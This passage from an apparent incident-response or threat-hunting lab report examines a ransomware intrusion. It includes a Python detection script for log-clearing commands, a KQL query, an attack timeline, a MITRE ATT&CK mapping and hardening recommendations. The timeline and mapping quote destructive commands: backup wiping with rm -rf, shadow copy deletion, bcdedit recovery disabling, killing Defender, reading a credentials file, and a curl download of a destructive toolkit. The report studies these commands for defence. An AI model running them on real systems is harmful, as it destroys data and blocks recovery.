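The observation above, that the initiating process tells an analyst whether an operator or the payload itself cleared the logs, can be turned into a triage rule. The following is an added example, not part of this report: it parses `wevtutil cl <log>` and `fsutil usn deletejournal` command lines, groups them per device and initiating process, and rates a group `critical` when the initiator is not an interactive shell. `EVENTS` is constructed from the command lines quoted in this section plus one benign `wevtutil qe` query; the `SHELLS` list and the severity rule are assumptions.

```python
"""Flag anti-forensic commands (USN journal deletion, event-log clearing) and rank
them by the process that launched them.

Added example (not part of the original report). EVENTS is constructed from the
report's command lines; SHELLS and the severity rule are assumptions.
"""
import shlex

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}  # assumption: interactive operator shells

EVENTS = [
    {"DeviceName": "azuki-adminpc", "InitiatingProcessCommandLine": "powershell.exe",
     "ProcessCommandLine": '"fsutil.exe" usn deletejournal /D C:'},
    {"DeviceName": "azuki-adminpc", "InitiatingProcessCommandLine": "powershell.exe",
     "ProcessCommandLine": '"wevtutil.exe" cl Security'},
    {"DeviceName": "azuki-adminpc", "InitiatingProcessCommandLine": "powershell.exe",
     "ProcessCommandLine": '"wevtutil.exe" cl System'},
    {"DeviceName": "azuki-sl", "InitiatingProcessCommandLine": "silentlynx.exe",
     "ProcessCommandLine": '"wevtutil" cl "Security"'},
    {"DeviceName": "azuki-sl", "InitiatingProcessCommandLine": "silentlynx.exe",
     "ProcessCommandLine": '"wevtutil" cl "System"'},
    {"DeviceName": "azuki-sl", "InitiatingProcessCommandLine": "silentlynx.exe",
     "ProcessCommandLine": '"wevtutil" cl "Application"'},
    {"DeviceName": "azuki-sl", "InitiatingProcessCommandLine": "silentlynx.exe",
     "ProcessCommandLine": '"wevtutil" cl "Microsoft-Windows-PowerShell/Operational"'},
    # constructed benign record: querying the Security log is not clearing it
    {"DeviceName": "azuki-adminpc", "InitiatingProcessCommandLine": "powershell.exe",
     "ProcessCommandLine": '"wevtutil" qe Security /c:5'},
]


def _tokens(cmdline):
    """Split a Windows command line keeping backslashes intact; strip surrounding quotes."""
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]


def _basename(path):
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def parse_antiforensic(cmdline):
    """('event_log_cleared', log) or ('usn_journal_deleted', volume); None otherwise."""
    toks = _tokens(cmdline)
    if len(toks) < 3:
        return None
    exe = _basename(toks[0])
    if exe in ("wevtutil", "wevtutil.exe") and toks[1].lower() in ("cl", "clear-log"):
        return ("event_log_cleared", toks[2])
    if exe in ("fsutil", "fsutil.exe") and [t.lower() for t in toks[1:3]] == ["usn", "deletejournal"]:
        volume = next((t for t in toks[3:] if not t.startswith("/")), "?")
        return ("usn_journal_deleted", volume)
    return None


def summarize(events):
    """Group anti-forensic actions per (device, initiating process) and assign a severity."""
    groups = {}
    for ev in events:
        hit = parse_antiforensic(ev["ProcessCommandLine"])
        if not hit:
            continue
        init_toks = _tokens(ev["InitiatingProcessCommandLine"])
        initiator = _basename(init_toks[0]) if init_toks else "?"
        g = groups.setdefault((ev["DeviceName"], initiator),
                              {"device": ev["DeviceName"], "initiated_by": initiator,
                               "logs_cleared": [], "usn_deleted": []})
        kind, target = hit
        (g["logs_cleared"] if kind == "event_log_cleared" else g["usn_deleted"]).append(target)
    out = []
    for g in groups.values():
        g["logs_cleared"].sort()
        g["usn_deleted"].sort()
        # a non-shell initiator means the payload clears its own tracks: no operator needed
        g["severity"] = "critical" if g["initiated_by"] not in SHELLS else "high"
        out.append(g)
    return out


if __name__ == "__main__":
    for g in summarize(EVENTS):
        print(g["severity"], g["device"], g["initiated_by"], g["logs_cleared"], g["usn_deleted"])
```

Because the clearing happens on the endpoint, this rule only works if the process events have already left the host, which is the point of the centralized log forwarding recommendation at the end of this report.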
### Impact — Ransomware Execution
#### Ransom Note
Querying DeviceFileEvents for `.txt` files created on Azuki devices confirmed the ransomware successfully encrypted files and dropped ransom notes.
```kql
DeviceFileEvents
| where DeviceName has "azuki"
| where TimeGenerated between (datetime(2025-11-25) .. datetime(2025-11-26))
| where ActionType == "FileCreated"
| where FileName endswith ".txt"
| project TimeGenerated, DeviceName, FileName
```
At `6:05:01 AM`, `SILENTLYNX_README.txt` was created on `azuki-adminpc`. At `6:07:09 AM`, the same ransom note was created on `azuki-sl`. Multiple instances on each device indicate the note was dropped in every directory containing encrypted files.
## Attack Timeline
| Time (UTC) | Action |
|------------|--------|
| Nov 24, 2:10 PM | Initial reconnaissance on backup server begins |
| Nov 24, 2:14 PM | `cat /backups/configs/all-credentials.txt` — Credential theft |
| Nov 24, 2:16 PM | `cat /etc/passwd` — Account enumeration |
| Nov 24, 2:16 PM | `cat /etc/crontab` — Scheduled job reconnaissance |
| Nov 25, 5:31 AM | Windows Defender processes killed (`taskkill /F /IM MsMpEng.exe`) |
| Nov 25, 5:39 AM | `"ssh.exe" backup-admin@10.1.0.189` — SSH lateral movement |
| Nov 25, 5:45 AM | `curl -L -o destroy.7z` — Destructive toolkit downloaded |
| Nov 25, 5:47 AM | `rm -rf /backups/*` — All backup data destroyed |
| Nov 25, 5:47 AM | `systemctl stop cron` / `systemctl disable cron` |
| Nov 25, 5:58 AM | `PsExec64.exe /accepteula` — PsExec first run |
| Nov 25, 5:58 AM | `vssadmin.exe delete shadows /all /quiet` — First shadow deletion |
| Nov 25, 5:59 AM | `vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB` |
| Nov 25, 5:59 AM | `bcdedit /set {default} recoveryenabled No` |
| Nov 25, 6:03 AM | PsExec → `silentlynx.exe` deployed to `10.1.0.102` |
| Nov 25, 6:04 AM | PsExec → `silentlynx.exe` deployed to `10.1.0.188` |
| Nov 25, 6:04 AM | `net stop VSS /y`, `net stop wbengine /y` — Services stopped |
| Nov 25, 6:04 AM | All file-locking processes killed (`taskkill /F /IM sqlservr.exe`, etc.) |
| Nov 25, 6:04 AM | `vssadmin delete shadows /all /quiet` — Second shadow deletion |
| Nov 25, 6:04 AM | `wbadmin delete catalog -quiet` — Backup catalog deleted |
| Nov 25, 6:05 AM | PsExec → `silentlynx.exe` deployed to `10.1.0.204` |
| Nov 25, 6:05 AM | Registry persistence (`WindowsSecurityHealth`) + Scheduled task created |
| Nov 25, 6:05 AM | `SILENTLYNX_README.txt` dropped on `azuki-adminpc` |
| Nov 25, 6:07 AM | `SILENTLYNX_README.txt` dropped on `azuki-sl` |
| Nov 25, 6:07 AM | Event logs cleared on `azuki-sl` by `silentlynx.exe` |
| Nov 25, 6:10 AM | USN journal deleted + event logs cleared on `azuki-adminpc` |
## MITRE ATT&CK Mapping
| Tactic | Technique ID | Technique Name | Evidence |
|--------|-------------|----------------|----------|
| Lateral Movement | T1021.004 | Remote Services: SSH | `"ssh.exe" backup-admin@10.1.0.189` |
| Lateral Movement | T1021.002 | SMB/Windows Admin Shares | `PsExec64.exe` deployment to 3 systems |
| Valid Accounts | T1078.002 | Domain Accounts | `backup-admin`, `kenji.sato`, `fileadmin` |
| Discovery | T1083 | File and Directory Discovery | `ls -la /backups/`, `find /backups -name *.tar.gz`, `cat /etc/crontab` |
| Discovery | T1087.001 | Account Discovery: Local | `cat /etc/passwd` |
| Credential Access | T1552.001 | Unsecured Credentials: Files | `cat /backups/configs/all-credentials.txt` |
| Command and Control | T1105 | Ingress Tool Transfer | `curl -L -o destroy.7z` from catbox.moe |
| Execution | T1204.002 | Malicious File | `silentlynx.exe` deployed via PsExec |
| Impact | T1485 | Data Destruction | `rm -rf /backups/*` — all backup data destroyed |
| Impact | T1486 | Data Encrypted for Impact | `SILENTLYNX_README.txt` ransom note |
| Impact | T1489 | Service Stop | `systemctl stop/disable cron`, `net stop VSS/wbengine` |
| Impact | T1490 | Inhibit System Recovery | Shadow deletion, storage resize, bcdedit, wbadmin |
| Defense Evasion | T1562.001 | Impair Defenses | `taskkill /F /IM MsMpEng.exe` |
| Defense Evasion | T1070.004 | Indicator Removal: File Deletion | `fsutil.exe usn deletejournal /D C:` |
| Persistence | T1547.001 | Registry Run Keys | `WindowsSecurityHealth` under `CurrentVersion\Run` |
| Persistence | T1053.005 | Scheduled Task | `Microsoft\Windows\Security\SecurityHealthService` |
## Recommendations
1. **Network Segmentation** — Isolate backup infrastructure on a separate VLAN with strict firewall rules. SSH access to backup servers should be restricted to jump hosts with MFA enforcement.
2. **Immutable Backups** — Implement immutable/air-gapped backups that cannot be modified or deleted even with administrative credentials. Consider WORM (Write Once Read Many) storage solutions.
3. **Credential Management** — Never store plaintext credentials in backup directories. Rotate all credentials exposed in `all-credentials.txt` immediately. Implement a privileged access management (PAM) solution.
4. **Endpoint Detection Rules** — Deploy EDR rules to detect PsExec usage, mass `taskkill` commands, `vssadmin` shadow deletion, `bcdedit` recovery modification, and `fsutil` journal deletion.
5. **Service Account Hardening** — The `backup-admin` account should use key-based SSH authentication only. Disable password-based SSH authentication on all servers.
6. **Monitoring & Alerting** — Create alerts for `systemctl disable` on critical services, bulk file deletion in backup directories, registry modifications to `CurrentVersion\Run`, and scheduled task creation mimicking Windows system paths.
7. **Centralized Log Forwarding** — Forward all logs to an external SIEM in real-time so that `wevtutil cl` and USN journal deletion cannot destroy evidence retroactively.